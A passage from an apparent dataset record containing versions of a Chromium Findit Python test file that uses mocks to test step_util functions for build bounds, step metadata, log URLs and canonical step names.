'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, '_GetAnnotationsProtoForPath',\n return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=\n 'log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual('log1/nlog2', step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None))\n\n @mock.patch.object(build_util, 'DownloadBuildData', return_value=\n MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(step_util.GetWaterfallBuildStepLog('m', 'b', 123,\n 's', None, 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's',\n None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build,\n mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(step_util.GetStepLogForLuciBuild(build_id, 's',\n None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n <mask token>\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log')\n )\n\n @parameterized.expand([(True, 'step_name', 'view_url',\n 'view_url_partial_match'), (False, 'step_name', 'view_url', None)])\n def testGetStepLogViewUrlPartialMatching(self, partial_match,\n full_step_name, expected_url_in_build1, expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(expected_url_in_build1, step_util.\n _GetStepLogViewUrl(mock_build1, full_step_name, 'log',\n partial_match=partial_match))\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(expected_url_in_build2, step_util.\n _GetStepLogViewUrl(mock_build2, full_step_name, 'log',\n partial_match=partial_match))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog', return_value=\n {'canonical_step_name': 'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n\n def testStepIsSupportedForMasterCompile(self):\n master_name = 'm'\n builder_name = 'b'\n build_number = 123\n step_name = 'compile'\n self.assertTrue(step_util.StepIsSupportedForMaster(master_name,\n builder_name, build_number, step_name))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n self.assertEqual('invalid', step_util.LegacyGetStepMetadata('m',\n 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n LegacyGetStepMetadata('m', 'b', 201, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n self.assertEqual(None, step_util.GetStepMetadata(123,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({'canonical_step_name': 'step_name'}, step_util.\n GetStepMetadata(123, 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'canonical_step_name': 'step_name'})\n def testLegacyGetCanonicalStep(self, _):\n self.assertEqual('step_name', step_util.LegacyGetCanonicalStepName(\n 'm', 'b', 200, 'step_name on a platform'))\n\n @parameterized.expand([({'canonical_step_name': 'step_name'},\n 'step_name'), (None, 'step_name'), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepName(self, step_metadata,\n expected_canonical_step, mocked_get_step):\n mocked_get_step.return_value = step_metadata\n self.assertEqual(expected_canonical_step, step_util.\n GetCanonicalStepName(123, 'step_name (with patch)'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetCanonicalStepNamePartialMatch(self, mock_get_step_metadata):\n step_util.GetCanonicalStepName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetCanonicalStepName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'isolate_target_name': 'browser_tests'})\n def testLegacyGetIsolateTargetName(self, _):\n self.assertEqual('browser_tests', step_util.\n LegacyGetIsolateTargetName('m', 'b', 200,\n 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value=None)\n def testLegacyGetIsolateTargetNameStepMetadataIsNone(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @mock.patch.object(step_util, 'LegacyGetStepMetadata', return_value={\n 'a': 'b'})\n def testLegacyGetIsolateTargetNameIsolateTargetNameIsMissing(self, _):\n self.assertEqual(None, step_util.LegacyGetIsolateTargetName('m',\n 'b', 200, 'viz_browser_tests (with patch) on Android'))\n\n @parameterized.expand([({'isolate_target_name': 'isolate_target'},\n 'isolate_target'), (None, None), ({'a': 'b'}, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetName(self, step_metadata,\n expected_isolate_target, mocked_get_stepmeta):\n mocked_get_stepmeta.return_value = step_metadata\n self.assertEqual(expected_isolate_target, step_util.\n GetIsolateTargetName(123, 'full step name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetIsolateTargetPartialMatch(self, mock_get_step_metadata):\n step_util.GetIsolateTargetName(123, 'full step name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetIsolateTargetName(123, 'full step name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @parameterized.expand([(wf_testcase.SAMPLE_STEP_METADATA, 'platform'),\n (None, None)])\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOS(self, mock_fn_return, expected_platform, mock_fn):\n mock_fn.return_value = mock_fn_return\n self.assertEqual(expected_platform, step_util.GetOS(123,\n 'builder_name', 'step_name'))\n\n @mock.patch.object(step_util, 'GetStepMetadata')\n def testGetOSPartialMatch(self, mock_get_step_metadata):\n step_util.GetOS(123, 'builder_name', 'step_name')\n self.assertIn(False, mock_get_step_metadata.call_args[0])\n step_util.GetOS(123, 'builder_name', 'step_name', True)\n self.assertIn(True, mock_get_step_metadata.call_args[0])\n\n @mock.patch.object(step_util, 'GetStepMetadata', return_value=\n wf_testcase.SAMPLE_STEP_METADATA)\n def testGetOSCached(self, mock_fn):\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n self.assertEqual('platform', step_util.GetOS(123, 'builder_name',\n 'step_name'))\n self.assertEqual(1, mock_fn.call_count)\n\n def testGetStepStartAndEndTime(self):\n build_id = '8945610992972640896'\n start_time = datetime.datetime(2019, 3, 6)\n end_time = datetime.datetime(2019, 3, 6, 0, 0, 10)\n step = Step()\n step.name = 's'\n step.start_time.FromDatetime(start_time)\n step.end_time.FromDatetime(end_time)\n build = Build()\n build.id = int(build_id)\n build.steps.extend([step])\n self.assertEqual((start_time, end_time), step_util.\n GetStepStartAndEndTime(build, 's'))\n self.assertEqual((None, None), step_util.GetStepStartAndEndTime(\n build, 's2'))\n",
"step-5": "# Copyright 2018 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport datetime\nimport json\nimport logging\nimport mock\n\nfrom parameterized import parameterized\n\nfrom buildbucket_proto import common_pb2\nfrom buildbucket_proto.build_pb2 import Build\nfrom buildbucket_proto.step_pb2 import Step\n\nfrom common.waterfall import buildbucket_client\nfrom infra_api_clients import logdog_util\nfrom libs.test_results.gtest_test_results import GtestTestResults\nfrom libs.test_results.webkit_layout_test_results import WebkitLayoutTestResults\nfrom model.isolated_target import IsolatedTarget\nfrom model.wf_build import WfBuild\nfrom services import step_util\nfrom services import swarming\nfrom waterfall import build_util\nfrom waterfall import waterfall_config\nfrom waterfall.build_info import BuildInfo\nfrom waterfall.test import wf_testcase\n\n\nclass MockWaterfallBuild(object):\n\n def __init__(self):\n self.build_id = None\n self.log_location = 'logdog://logs.chromium.org/chromium/buildbucket/path'\n\n\ndef _MockedGetBuildInfo(master_name, builder_name, build_number):\n build = BuildInfo(master_name, builder_name, build_number)\n build.commit_position = (build_number + 1) * 10\n build.result = (\n common_pb2.SUCCESS if build_number > 4 else common_pb2.INFRA_FAILURE)\n return build\n\n\nclass StepUtilTest(wf_testcase.WaterfallTestCase):\n\n def testGetLowerBoundBuildNumber(self):\n self.assertEqual(5, step_util._GetLowerBoundBuildNumber(5, 100))\n self.assertEqual(50, step_util._GetLowerBoundBuildNumber(None, 100, 200))\n self.assertEqual(100, step_util._GetLowerBoundBuildNumber(None, 600, 500))\n\n def testGetBoundingIsolatedTargets(self):\n lower_bound_commit_position = 1000\n upper_bound_commit_position = 1010\n requested_commit_position = 1005\n build_id = 10000\n target_name = 'browser_tests'\n master_name = 'm'\n builder_name = 'b'\n luci_name = 'chromium'\n bucket_name = 'ci'\n gitiles_host = 'chromium.googlesource.com'\n gitiles_project = 'chromium/src'\n gitiles_ref = 'refs/heads/master'\n gerrit_patch = ''\n lower_bound_revision = 'r1000'\n upper_bound_revision = 'r1010'\n\n lower_bound_target = IsolatedTarget.Create(\n build_id - 1, luci_name, bucket_name, master_name, builder_name,\n gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_1', lower_bound_commit_position, lower_bound_revision)\n lower_bound_target.put()\n\n upper_bound_target = IsolatedTarget.Create(\n build_id, luci_name, bucket_name, master_name, builder_name,\n gitiles_host, gitiles_project, gitiles_ref, gerrit_patch, target_name,\n 'hash_2', upper_bound_commit_position, upper_bound_revision)\n upper_bound_target.put()\n\n self.assertEqual((lower_bound_target, upper_bound_target),\n step_util.GetBoundingIsolatedTargets(\n master_name, builder_name, target_name,\n requested_commit_position))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingWithinRange(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_101,\n valid_build_102,\n ]\n\n self.assertEqual(\n valid_build_102,\n step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 2))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchAscendingOutOfRange(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_101 = BuildInfo(master_name, builder_name, 101)\n valid_build_102 = BuildInfo(master_name, builder_name, 102)\n valid_build_102.commit_position = 1020\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_101,\n valid_build_102,\n ]\n\n self.assertIsNone(\n step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 1))\n\n @mock.patch.object(build_util, 'GetBuildInfo')\n def testGetValidBuildSearchDescending(self, mocked_get_build_info):\n master_name = 'm'\n builder_name = 'b'\n step_name = 's'\n\n invalid_build_100 = BuildInfo(master_name, builder_name, 100)\n invalid_build_99 = BuildInfo(master_name, builder_name, 99)\n valid_build_98 = BuildInfo(master_name, builder_name, 98)\n valid_build_98.commit_position = 980\n\n mocked_get_build_info.side_effect = [\n invalid_build_100,\n invalid_build_99,\n valid_build_98,\n ]\n\n self.assertEqual(\n valid_build_98,\n step_util.GetValidBuild(master_name, builder_name, 100, step_name, True,\n 2))\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepExactMatch(self, *_):\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', 0, 100, 30)\n self.assertEqual(1, lower_bound.build_number)\n self.assertEqual(2, upper_bound.build_number)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuild(self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, 100, 10)\n\n self.assertIsNone(lower_bound)\n self.assertEqual(lower_bound_build_number, upper_bound.build_number)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitBeforeEarliestBuildInValid(\n self, *_):\n lower_bound_build_number = 3\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, 100, 10)\n\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuild(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 10000)\n self.assertEqual(upper_bound_build_number, lower_bound.build_number)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=False)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitAfterLatestBuildInvalid(self, *_):\n upper_bound_build_number = 5\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 10000)\n\n self.assertIsNone(lower_bound)\n self.assertIsNone(upper_bound)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtUpperBound(self, *_):\n upper_bound_build_number = 4\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', None, upper_bound_build_number, 50)\n\n self.assertEqual(50, lower_bound.commit_position)\n self.assertEqual(50, upper_bound.commit_position)\n\n @mock.patch.object(\n swarming, 'CanFindSwarmingTaskFromBuildForAStep', return_value=True)\n @mock.patch.object(build_util, 'GetBuildInfo', _MockedGetBuildInfo)\n def testGetValidBoundingBuildsForStepCommitRightAtLowerBound(self, *_):\n upper_bound_build_number = 4\n lower_bound_build_number = 1\n lower_bound, upper_bound = step_util.GetValidBoundingBuildsForStep(\n 'm', 'b', 's', lower_bound_build_number, upper_bound_build_number, 20)\n\n self.assertEqual(20, lower_bound.commit_position)\n self.assertEqual(20, upper_bound.commit_position)\n\n def testIsStepSupportedByFinditObjectNone(self):\n self.assertFalse(step_util.IsStepSupportedByFindit(None, 'step', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=False)\n def testStepNotSupportedByFindit(self, _):\n self.assertFalse(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'step', 'm'))\n\n def testIsStepSupportedByFinditOtherIsolatedScriptTest(self):\n self.assertFalse(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'telemetry_perf_tests', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=True)\n def testIsStepSupportedByFinditWebkitLayoutTests(self, _):\n self.assertTrue(\n step_util.IsStepSupportedByFindit(\n WebkitLayoutTestResults(None), 'webkit_layout_tests', 'm'))\n\n @mock.patch.object(\n waterfall_config, 'StepIsSupportedForMaster', return_value=True)\n def testIsStepSupportedByFinditGtests(self, _):\n self.assertTrue(\n step_util.IsStepSupportedByFindit(\n GtestTestResults(None), 'browser_tests', 'm'))\n\n @parameterized.expand([\n ({\n 'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,\n 'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA\n },),\n ({\n 'step_log_return': wf_testcase.SAMPLE_STEP_METADATA,\n 'expected_step_metadata': wf_testcase.SAMPLE_STEP_METADATA\n },),\n ({\n 'step_log_return': None,\n 'expected_step_metadata': None\n },),\n ({\n 'step_log_return': None,\n 'expected_step_metadata': None\n },),\n ])\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadata(self, cases, mock_step_log):\n mock_step_log.return_value = cases['step_log_return']\n step_metadata = step_util.GetStepMetadata(123, 'step')\n self.assertEqual(cases['expected_step_metadata'], step_metadata)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataPartialMatch(self, mock_step_log):\n step_util.GetStepMetadata(123, 'step', True)\n self.assertIn(True, mock_step_log.call_args[0])\n step_util.GetStepMetadata(123, 'step', False)\n self.assertIn(False, mock_step_log.call_args[0])\n\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(\n logdog_util, '_GetStreamForStep', return_value='log_stream')\n @mock.patch.object(\n logdog_util,\n 'GetStepLogLegacy',\n return_value=json.dumps(wf_testcase.SAMPLE_STEP_METADATA))\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n def testLegacyGetStepMetadata(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value=':')\n def testMalformattedNinjaInfo(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog(\n 'm', 'b', 123, 's', None, 'json.output[ninja_info]')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value=None)\n def testLegacyGetStepMetadataStepNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value=None)\n def testLegacyGetStepMetadataStreamNone(self, *_):\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertIsNone(step_metadata)\n\n @mock.patch.object(\n step_util,\n 'GetStepLogForLuciBuild',\n return_value=wf_testcase.SAMPLE_STEP_METADATA)\n @mock.patch.object(build_util, 'DownloadBuildData')\n def testLegacyGetStepMetadataFromLUCIBuild(self, mock_build, _):\n build = WfBuild.Create('m', 'b', 123)\n build.build_id = '8948240770002521488'\n build.put()\n mock_build.return_value = build\n step_metadata = step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata')\n self.assertEqual(step_metadata, wf_testcase.SAMPLE_STEP_METADATA)\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(\n logdog_util, '_GetAnnotationsProtoForPath', return_value='step')\n @mock.patch.object(logdog_util, '_GetStreamForStep', return_value='stream')\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log1/nlog2')\n def testGetStepLogStdio(self, *_):\n self.assertEqual(\n 'log1/nlog2',\n step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None))\n\n @mock.patch.object(\n build_util, 'DownloadBuildData', return_value=MockWaterfallBuild())\n @mock.patch.object(logdog_util, 'GetStepLogLegacy', return_value='log')\n @mock.patch.object(logging, 'error')\n def testGetStepLogNotJosonLoadable(self, mocked_log, *_):\n self.assertIsNone(\n step_util.GetWaterfallBuildStepLog('m', 'b', 123, 's', None,\n 'step_metadata'))\n mocked_log.assert_called_with(\n 'Failed to json load data for step_metadata. Data is: log.')\n\n @mock.patch.object(buildbucket_client, 'GetV2Build', return_value=None)\n def testGetStepLogForLuciBuildError(self, _):\n self.assertIsNone(step_util.GetStepLogForLuciBuild('87654321', 's', None))\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuildNoViewUrl(self, mock_get_build, mock_get_log,\n _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertIsNone(\n step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))\n self.assertFalse(mock_get_log.called)\n\n @mock.patch.object(\n step_util, '_ParseStepLogIfAppropriate', return_value='log')\n @mock.patch.object(logdog_util, 'GetLogFromViewUrl', return_value='log')\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n def testGetStepLogForLuciBuild(self, mock_get_build, mock_get_log, _):\n build_id = '8945610992972640896'\n mock_log = common_pb2.Log()\n mock_log.name = 'step_metadata'\n mock_log.view_url = 'view_url'\n mock_step = Step()\n mock_step.name = 's'\n mock_step.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = int(build_id)\n mock_build.steps.extend([mock_step])\n mock_get_build.return_value = mock_build\n self.assertEqual(\n 'log',\n step_util.GetStepLogForLuciBuild(build_id, 's', None, 'step_metadata'))\n mock_get_log.assert_called_once_with('view_url', None)\n\n @mock.patch.object(buildbucket_client, 'GetV2Build')\n @mock.patch.object(step_util, 'GetStepLogFromBuildObject')\n def testGetStepLogForLuciBuildPartialMatch(self, mock_log_from_build, _):\n step_util.GetStepLogForLuciBuild('87654321', 's', None)\n self.assertIn(False, mock_log_from_build.call_args[0])\n step_util.GetStepLogForLuciBuild('87654321', 's', None, True)\n self.assertIn(True, mock_log_from_build.call_args[0])\n\n @mock.patch.object(step_util, '_GetStepLogViewUrl', return_value=None)\n def testGetStepLogFromBuildObjectPartialMatch(self, mock_get_log_url):\n step_util.GetStepLogFromBuildObject(Build(), 'full_step_name',\n 'http_client')\n self.assertIn(False, mock_get_log_url.call_args[0])\n step_util.GetStepLogFromBuildObject(\n Build(), 'full_step_name', 'http_client', partial_match=True)\n self.assertIn(True, mock_get_log_url.call_args[0])\n\n def testGetStepLogViewUrlNoMatchingLog(self):\n build_id = 8945610992972640896\n mock_log = common_pb2.Log()\n mock_log.name = 'another_log'\n mock_log.view_url = 'view_url'\n mock_step1 = Step()\n mock_step1.name = 's1'\n mock_step1.logs.extend([mock_log])\n mock_step2 = Step()\n mock_step2.name = 's2'\n mock_step2.logs.extend([mock_log])\n mock_build = Build()\n mock_build.id = build_id\n mock_build.steps.extend([mock_step1, mock_step2])\n self.assertIsNone(step_util._GetStepLogViewUrl(mock_build, 's2', 'log'))\n\n @parameterized.expand([\n (True, 'step_name', 'view_url', 'view_url_partial_match'),\n (False, 'step_name', 'view_url', None),\n ])\n def testGetStepLogViewUrlPartialMatching(self, partial_match, full_step_name,\n expected_url_in_build1,\n expected_url_in_build2):\n mock_step1 = Step()\n mock_step1.name = 'step_name'\n mock_log1 = common_pb2.Log()\n mock_log1.name = 'log'\n mock_log1.view_url = 'view_url'\n mock_step1.logs.extend([mock_log1])\n\n mock_step2 = Step()\n mock_step2.name = 'step_name_longer'\n mock_log2 = common_pb2.Log()\n mock_log2.name = 'log'\n mock_log2.view_url = 'view_url_partial_match'\n mock_step2.logs.extend([mock_log2])\n\n mock_build1 = Build()\n mock_build1.steps.extend([mock_step1, mock_step2])\n self.assertEqual(\n expected_url_in_build1,\n step_util._GetStepLogViewUrl(\n mock_build1, full_step_name, 'log', partial_match=partial_match))\n\n mock_build2 = Build()\n mock_build2.steps.extend([mock_step2])\n self.assertEqual(\n expected_url_in_build2,\n step_util._GetStepLogViewUrl(\n mock_build2, full_step_name, 'log', partial_match=partial_match))\n\n @mock.patch.object(\n step_util,\n 'GetWaterfallBuildStepLog',\n return_value={'canonical_step_name': 'unsupported_step1'})\n def testStepIsSupportedForMaster(self, _):\n master_name = 'master1'\n builder_name = 'b'\n build_number = 123\n step_name = 'unsupported_step1 on master1'\n self.assertFalse(\n step_util.StepIsSupportedForMaster(master_name, builder_name,\n build_number, step_name))\n\n def testStepIsSupportedForMasterCompile(self):\n master_name = 'm'\n builder_name = 'b'\n build_number = 123\n step_name = 'compile'\n self.assertTrue(\n step_util.StepIsSupportedForMaster(master_name, builder_name,\n build_number, step_name))\n\n @mock.patch.object(step_util, 'GetWaterfallBuildStepLog')\n def testLegacyGetStepMetadataCached(self, mock_fn):\n mock_fn.side_effect = ['invalid', {'canonical_step_name': 'step_name'}]\n # Returns the invalid step_metadata but not cache it.\n self.assertEqual(\n 'invalid',\n step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 1)\n # Returns the valid step_metadata and cache it.\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n self.assertEqual({\n 'canonical_step_name': 'step_name'\n }, step_util.LegacyGetStepMetadata('m', 'b', 201,\n 'step_name on a platform'))\n self.assertTrue(mock_fn.call_count == 2)\n\n @mock.patch.object(step_util, 'GetStepLogForLuciBuild')\n def testGetStepMetadataCached(self, mock_fn, *_):\n mock_fn.side_effect = [None, {'canonical_step_name': 'step_name'}]\n # Returns the invalid 